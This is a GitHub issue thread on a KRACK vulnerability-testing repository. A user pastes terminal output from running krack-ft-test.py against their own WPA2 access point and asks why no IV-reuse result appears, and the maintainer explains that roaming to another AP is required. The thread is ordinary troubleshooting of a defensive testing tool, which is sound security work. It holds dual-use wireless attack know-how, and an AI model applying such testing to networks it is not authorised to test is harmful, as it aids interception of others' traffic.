vanhoefm / krackattacks-scripts

Other
3.3k stars 768 forks source link

krackattacks-AP #43

Closed gurusamraj closed 3 years ago

gurusamraj commented 6 years ago

I have connected with AP, Frames are detected and also krack attack stated using this script (./krack-ft-test.py). But i didn't get any "Replaying Reassociation Request" or "IV reuse detected (IV=1, seq=0). AP is vulnerable!" on the output screen. can any one explain me about this issue.Below is terminal log

Note: I am using WPA2-PSK security mode.

root@wipro123-Latitude-E5430-non-vPro:/home/wipro123/krackattacks-scripts/krackattack# ./krack-ft-test.py wpa_supplicant -D nl80211 -i wlp2s0 -c network.conf [12:53:53] Note: disable Wi-Fi in your network manager so it doesn't interfere with this script Successfully initialized wpa_supplicant wlp2s0: SME: Trying to authenticate with 30:91:8f:7b:a8:47 (SSID='guru_5G' freq=5240 MHz) wlp2s0: Trying to associate with 30:91:8f:7b:a8:47 (SSID='guru_5G' freq=5240 MHz) [12:53:57] Detected Authentication frame, clearing client state [12:53:57] Detected Authentication frame, clearing client state [12:53:57] Detected normal association frame wlp2s0: Associated with 30:91:8f:7b:a8:47 wlp2s0: WPA: Key negotiation completed with 30:91:8f:7b:a8:47 [PTK=CCMP GTK=CCMP] wlp2s0: CTRL-EVENT-CONNECTED - Connection to 30:91:8f:7b:a8:47 completed [id=0 id_str=] [12:53:57] AP transmitted data using IV=1 (seq=0) [12:54:37] AP transmitted data using IV=382 (seq=1) [12:54:38] AP transmitted data using IV=383 (seq=2) [12:54:38] AP transmitted data using IV=384 (seq=3) [12:54:38] AP transmitted data using IV=385 (seq=4) [12:54:38] AP transmitted data using IV=386 (seq=5) [12:54:39] AP transmitted data using IV=409 (seq=6) [12:54:40] AP transmitted data using IV=440 (seq=7) [12:54:41] AP transmitted data using IV=475 (seq=8) [12:54:41] AP transmitted data using IV=490 (seq=9)

vanhoefm commented 3 years ago

You have to roam to another AP in order to capture an FT Reassociation Request.